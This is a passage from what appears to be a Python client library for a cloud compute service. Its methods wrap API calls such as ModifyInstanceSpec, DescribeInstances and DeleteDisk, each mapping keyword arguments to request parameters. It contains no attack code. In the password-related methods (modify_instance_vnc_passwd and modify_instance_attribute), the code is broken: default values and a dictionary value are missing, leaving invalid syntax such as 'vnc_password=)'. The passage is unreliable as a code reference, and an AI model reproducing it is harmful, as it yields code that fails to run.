resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyInstanceVpcAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "PrivateIpAddress": private_ip_address, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_vnc_passwd( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None, vnc_password=): api_request = APIRequest('ModifyInstanceVncPasswd', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "VncPassword": } return self._handle_request(api_request).result def modify_instance_spec( self, resource_owner_id=None, resource_owner_account=None, client_token=None, allow_migrate_across_zone=None, owner_account=None, internet_max_bandwidth_out=None, owner_id=None, temporary_internet_max_bandwidth_out=None, system_disk_category=None, temporary_start_time=None, async_=None, instance_id=None, instance_type=None, temporary_end_time=None, internet_max_bandwidth_in=None): api_request = APIRequest('ModifyInstanceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "AllowMigrateAcrossZone": allow_migrate_across_zone, "OwnerAccount": owner_account, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "OwnerId": owner_id, "Temporary.InternetMaxBandwidthOut": temporary_internet_max_bandwidth_out, "SystemDisk.Category": system_disk_category, "Temporary.StartTime": temporary_start_time, "Async": async_, "InstanceId": instance_id, "InstanceType": instance_type, "Temporary.EndTime": temporary_end_time, "InternetMaxBandwidthIn": internet_max_bandwidth_in} return self._handle_request(api_request).result def modify_instance_network_spec( self, resource_owner_id=None, auto_pay=None, resource_owner_account=None, client_token=None, owner_account=None, internet_max_bandwidth_out=None, end_time=None, start_time=None, owner_id=None, instance_id=None, network_charge_type=None, internet_max_bandwidth_in=None, allocate_public_ip=None): api_request = APIRequest('ModifyInstanceNetworkSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id, "InstanceId": instance_id, "NetworkChargeType": network_charge_type, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "AllocatePublicIp": allocate_public_ip} return self._handle_request(api_request).result def modify_instance_attribute( self, resource_owner_id=None, resource_owner_account=None, recyclable=None, owner_account=None, description=None, credit_specification=None, owner_id=None, deletion_protection=None, user_data=None, password=, host_name=None, instance_id=None, instance_name=None): api_request = APIRequest('ModifyInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Recyclable": recyclable, "OwnerAccount": owner_account, "Description": description, "CreditSpecification": credit_specification, "OwnerId": owner_id, "DeletionProtection": deletion_protection, "UserData": user_data, "Password": password, "HostName": host_name, "InstanceId": instance_id, "InstanceName": instance_name} return self._handle_request(api_request).result def modify_image_share_permission( self, resource_owner_id=None, image_id=None, list_of_add_account=None, resource_owner_account=None, region_id=None, list_of_remove_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyImageSharePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "AddAccount": list_of_add_account, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "RemoveAccount": list_of_remove_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"AddAccount": ('AddAccount', 'list', 'str', None), "RemoveAccount": ('RemoveAccount', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_image_share_group_permission( self, resource_owner_id=None, image_id=None, add_group1=None, resource_owner_account=None, region_id=None, owner_account=None, remove_group1=None, owner_id=None): api_request = APIRequest('ModifyImageShareGroupPermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "AddGroup.1": add_group1, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RemoveGroup.1": remove_group1, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_image_attribute( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, image_name=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyImageAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ImageName": image_name, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_eip_address_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, bandwidth=None, owner_account=None, allocation_id=None, owner_id=None): api_request = APIRequest('ModifyEipAddressAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "OwnerAccount": owner_account, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_disk_attribute( self, disk_name=None, delete_auto_snapshot=None, resource_owner_id=None, enable_auto_snapshot=None, resource_owner_account=None, owner_account=None, description=None, disk_id=None, owner_id=None, delete_with_instance=None): api_request = APIRequest('ModifyDiskAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskName": disk_name, "DeleteAutoSnapshot": delete_auto_snapshot, "ResourceOwnerId": resource_owner_id, "EnableAutoSnapshot": enable_auto_snapshot, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "DiskId": disk_id, "OwnerId": owner_id, "DeleteWithInstance": delete_with_instance} return self._handle_request(api_request).result def modify_auto_snapshot_policy( self, data_disk_policy_enabled=None, resource_owner_id=None, data_disk_policy_retention_days=None, resource_owner_account=None, system_disk_policy_retention_last_week=None, owner_account=None, system_disk_policy_time_period=None, owner_id=None, data_disk_policy_retention_last_week=None, system_disk_policy_retention_days=None, data_disk_policy_time_period=None, system_disk_policy_enabled=None): api_request = APIRequest('ModifyAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "DataDiskPolicyEnabled": data_disk_policy_enabled, "ResourceOwnerId": resource_owner_id, "DataDiskPolicyRetentionDays": data_disk_policy_retention_days, "ResourceOwnerAccount": resource_owner_account, "SystemDiskPolicyRetentionLastWeek": system_disk_policy_retention_last_week, "OwnerAccount": owner_account, "SystemDiskPolicyTimePeriod": system_disk_policy_time_period, "OwnerId": owner_id, "DataDiskPolicyRetentionLastWeek": data_disk_policy_retention_last_week, "SystemDiskPolicyRetentionDays": system_disk_policy_retention_days, "DataDiskPolicyTimePeriod": data_disk_policy_time_period, "SystemDiskPolicyEnabled": system_disk_policy_enabled} return self._handle_request(api_request).result def leave_security_group( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('LeaveSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def join_security_group( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('JoinSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_disk( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('DetachDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_zones( self, spot_strategy=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, accept_language=None, owner_id=None, instance_charge_type=None, verbose=None): api_request = APIRequest('DescribeZones', 'GET', 'http', 'RPC', 'query') api_request._params = { "SpotStrategy": spot_strategy, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AcceptLanguage": accept_language, "OwnerId": owner_id, "InstanceChargeType": instance_charge_type, "Verbose": verbose} return self._handle_request(api_request).result def describe_vswitches( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, page_size=None, zone_id=None, is_default=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVSwitches', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "PageSize": page_size, "ZoneId": zone_id, "IsDefault": is_default, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_vrouters( self, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVRouters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_vpcs( self, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, page_size=None, is_default=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVpcs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "PageSize": page_size, "IsDefault": is_default, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_snapshots( self, resource_owner_id=None, filter2_value=None, snapshot_ids=None, usage=None, snapshot_link_id=None, snapshot_name=None, page_number=None, resource_group_id=None, filter1_key=None, region_id=None, page_size=None, disk_id=None, list_of_tag=None, dry_run=None, resource_owner_account=None, owner_account=None, source_disk_type=None, filter1_value=None, filter2_key=None, owner_id=None, instance_id=None, encrypted=None, snapshot_type=None, kms_key_id=None, status=None): api_request = APIRequest('DescribeSnapshots', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Filter.2.Value": filter2_value, "SnapshotIds": snapshot_ids, "Usage": usage, "SnapshotLinkId": snapshot_link_id, "SnapshotName": snapshot_name, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "Filter.1.Key": filter1_key, "RegionId": region_id, "PageSize": page_size, "DiskId": disk_id, "Tag": list_of_tag, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SourceDiskType": source_disk_type, "Filter.1.Value": filter1_value, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "InstanceId": instance_id, "Encrypted": encrypted, "SnapshotType": snapshot_type, "KMSKeyId": kms_key_id, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_security_groups( self, resource_owner_id=None, dry_run=None, fuzzy_query=None, resource_owner_account=None, owner_account=None, security_group_id=None, is_query_ecs_count=None, network_type=None, owner_id=None, security_group_ids=None, security_group_name=None, page_number=None, resource_group_id=None, region_id=None, vpc_id=None, page_size=None, list_of_tag=None): api_request = APIRequest('DescribeSecurityGroups', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DryRun": dry_run, "FuzzyQuery": fuzzy_query, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "IsQueryEcsCount": is_query_ecs_count, "NetworkType": network_type, "OwnerId": owner_id, "SecurityGroupIds": security_group_ids, "SecurityGroupName": security_group_name, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "RegionId": region_id, "VpcId": vpc_id, "PageSize": page_size, "Tag": list_of_tag} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_security_group_attribute( self, nic_type=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, owner_id=None, direction=None): api_request = APIRequest('DescribeSecurityGroupAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id, "Direction": direction} return self._handle_request(api_request).result def describe_route_tables( self, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, owner_account=None, owner_id=None, page_number=None, router_type=None, route_table_name=None, region_id=None, router_id=None, page_size=None, route_table_id=None): api_request = APIRequest('DescribeRouteTables', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PageNumber": page_number, "RouterType": router_type, "RouteTableName": route_table_name, "RegionId": region_id, "RouterId": router_id, "PageSize": page_size, "RouteTableId": route_table_id} return self._handle_request(api_request).result def describe_regions( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, accept_language=None, owner_id=None, instance_charge_type=None, resource_type=None): api_request = APIRequest('DescribeRegions', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "AcceptLanguage": accept_language, "OwnerId": owner_id, "InstanceChargeType": instance_charge_type, "ResourceType": resource_type} return self._handle_request(api_request).result def describe_limitation( self, limitation=None, resource_owner_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeLimitation', 'GET', 'http', 'RPC', 'query') api_request._params = { "Limitation": limitation, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_vnc_url( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceVncUrl', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_vnc_passwd( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceVncPasswd', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_types( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None): api_request = APIRequest('DescribeInstanceTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_status( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, zone_id=None, cluster_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "ZoneId": zone_id, "ClusterId": cluster_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_instances( self, inner_ip_addresses=None, resource_owner_id=None, image_id=None, private_ip_addresses=None, hpc_cluster_id=None, filter2_value=None, filter4_value=None, io_optimized=None, security_group_id=None, key_pair_name=None, filter4_key=None, page_number=None, resource_group_id=None, lock_reason=None, filter1_key=None, region_id=None, rdma_ip_addresses=None, device_available=None, page_size=None, public_ip_addresses=None, instance_type=None, list_of_tag=None, instance_charge_type=None, filter3_value=None, dry_run=None, resource_owner_account=None, owner_account=None, instance_type_family=None, filter1_value=None, need_sale_cycle=None, filter2_key=None, owner_id=None, vswitch_id=None, eip_addresses=None, instance_name=None, instance_ids=None, internet_charge_type=None, vpc_id=None, zone_id=None, filter3_key=None, instance_network_type=None, status=None): api_request = APIRequest('DescribeInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "InnerIpAddresses": inner_ip_addresses, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "PrivateIpAddresses": private_ip_addresses, "HpcClusterId": hpc_cluster_id, "Filter.2.Value": filter2_value, "Filter.4.Value": filter4_value, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "KeyPairName": key_pair_name, "Filter.4.Key": filter4_key, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "RdmaIpAddresses": rdma_ip_addresses, "DeviceAvailable": device_available, "PageSize": page_size, "PublicIpAddresses": public_ip_addresses, "InstanceType": instance_type, "Tag": list_of_tag, "InstanceChargeType": instance_charge_type, "Filter.3.Value": filter3_value, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "Filter.1.Value": filter1_value, "NeedSaleCycle": need_sale_cycle, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "VSwitchId": vswitch_id, "EipAddresses": eip_addresses, "InstanceName": instance_name, "InstanceIds": instance_ids, "InternetChargeType": internet_charge_type, "VpcId": vpc_id, "ZoneId": zone_id, "Filter.3.Key": filter3_key, "InstanceNetworkType": instance_network_type, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_physical_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstancePhysicalAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_monitor_data( self, resource_owner_id=None, start_time=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, instance_id=None): api_request = APIRequest('DescribeInstanceMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_instance_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_image_share_permission( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeImageSharePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_images( self, action_type=None, resource_owner_id=None, image_id=None, snapshot_id=None, usage=None, page_number=None, image_owner_alias=None, resource_group_id=None, is_support_io_optimized=None, region_id=None, image_name=None, is_support_cloudinit=None, page_size=None, instance_type=None, list_of_tag=None, architecture=None, dry_run=None, resource_owner_account=None, owner_account=None, show_expired=None, os_type=None, owner_id=None, list_of_filter_=None, status=None): api_request = APIRequest('DescribeImages', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActionType": action_type, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "SnapshotId": snapshot_id, "Usage": usage, "PageNumber": page_number, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "IsSupportIoOptimized": is_support_io_optimized, "RegionId": region_id, "ImageName": image_name, "IsSupportCloudinit": is_support_cloudinit, "PageSize": page_size, "InstanceType": instance_type, "Tag": list_of_tag, "Architecture": architecture, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "ShowExpired": show_expired, "OSType": os_type, "OwnerId": owner_id, "Filter": list_of_filter_, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Filter": ('Filter', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_eip_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, allocation_id=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeEipMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "AllocationId": allocation_id, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_eip_addresses( self, resource_owner_id=None, resource_owner_account=None, filter2_value=None, isp=None, owner_account=None, allocation_id=None, filter1_value=None, filter2_key=None, owner_id=None, eip_address=None, page_number=None, lock_reason=None, filter1_key=None, region_id=None, associated_instance_type=None, page_size=None, charge_type=None, associated_instance_id=None, status=None): api_request = APIRequest('DescribeEipAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Filter.2.Value": filter2_value, "ISP": isp, "OwnerAccount": owner_account, "AllocationId": allocation_id, "Filter.1.Value": filter1_value, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "EipAddress": eip_address, "PageNumber": page_number, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "AssociatedInstanceType": associated_instance_type, "PageSize": page_size, "ChargeType": charge_type, "AssociatedInstanceId": associated_instance_id, "Status": status} return self._handle_request(api_request).result def describe_disks( self, resource_owner_id=None, snapshot_id=None, filter2_value=None, auto_snapshot_policy_id=None, page_number=None, disk_name=None, delete_auto_snapshot=None, resource_group_id=None, disk_charge_type=None, lock_reason=None, filter1_key=None, region_id=None, page_size=None, disk_ids=None, list_of_tag=None, delete_with_instance=None, enable_auto_snapshot=None, dry_run=None, resource_owner_account=None, owner_account=None, filter1_value=None, portable=None, enable_automated_snapshot_policy=None, filter2_key=None, owner_id=None, disk_type=None, list_of_additional_attributes=None, enable_shared=None, instance_id=None, encrypted=None, zone_id=None, category=None, kms_key_id=None, status=None): api_request = APIRequest('DescribeDisks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "Filter.2.Value": filter2_value, "AutoSnapshotPolicyId": auto_snapshot_policy_id, "PageNumber": page_number, "DiskName": disk_name, "DeleteAutoSnapshot": delete_auto_snapshot, "ResourceGroupId": resource_group_id, "DiskChargeType": disk_charge_type, "LockReason": lock_reason, "Filter.1.Key": filter1_key, "RegionId": region_id, "PageSize": page_size, "DiskIds": disk_ids, "Tag": list_of_tag, "DeleteWithInstance": delete_with_instance, "EnableAutoSnapshot": enable_auto_snapshot, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Filter.1.Value": filter1_value, "Portable": portable, "EnableAutomatedSnapshotPolicy": enable_automated_snapshot_policy, "Filter.2.Key": filter2_key, "OwnerId": owner_id, "DiskType": disk_type, "AdditionalAttributes": list_of_additional_attributes, "EnableShared": enable_shared, "InstanceId": instance_id, "Encrypted": encrypted, "ZoneId": zone_id, "Category": category, "KMSKeyId": kms_key_id, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "AdditionalAttributes": ('AdditionalAttributes', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_disk_monitor_data( self, resource_owner_id=None, start_time=None, disk_id=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None): api_request = APIRequest('DescribeDiskMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "DiskId": disk_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_clusters( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeClusters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_vswitch( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteVSwitch', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_vpc( self, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_snapshot( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('DeleteSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_security_group( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('DeleteSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_route_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, destination_cidr_block=None, owner_account=None, next_hop_id=None, owner_id=None, list_of_next_hop_list=None, route_table_id=None): api_request = APIRequest('DeleteRouteEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "DestinationCidrBlock": destination_cidr_block, "OwnerAccount": owner_account, "NextHopId": next_hop_id, "OwnerId": owner_id, "NextHopList": list_of_next_hop_list, "RouteTableId": route_table_id} repeat_info = { "NextHopList": ( 'NextHopList', 'list', 'dict', [ ('NextHopId', 'str', None, None), ('NextHopType', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_instance( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, terminate_subscription=None, force=None, owner_id=None): api_request = APIRequest('DeleteInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "TerminateSubscription": terminate_subscription, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('DeleteImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_disk( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('DeleteDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": 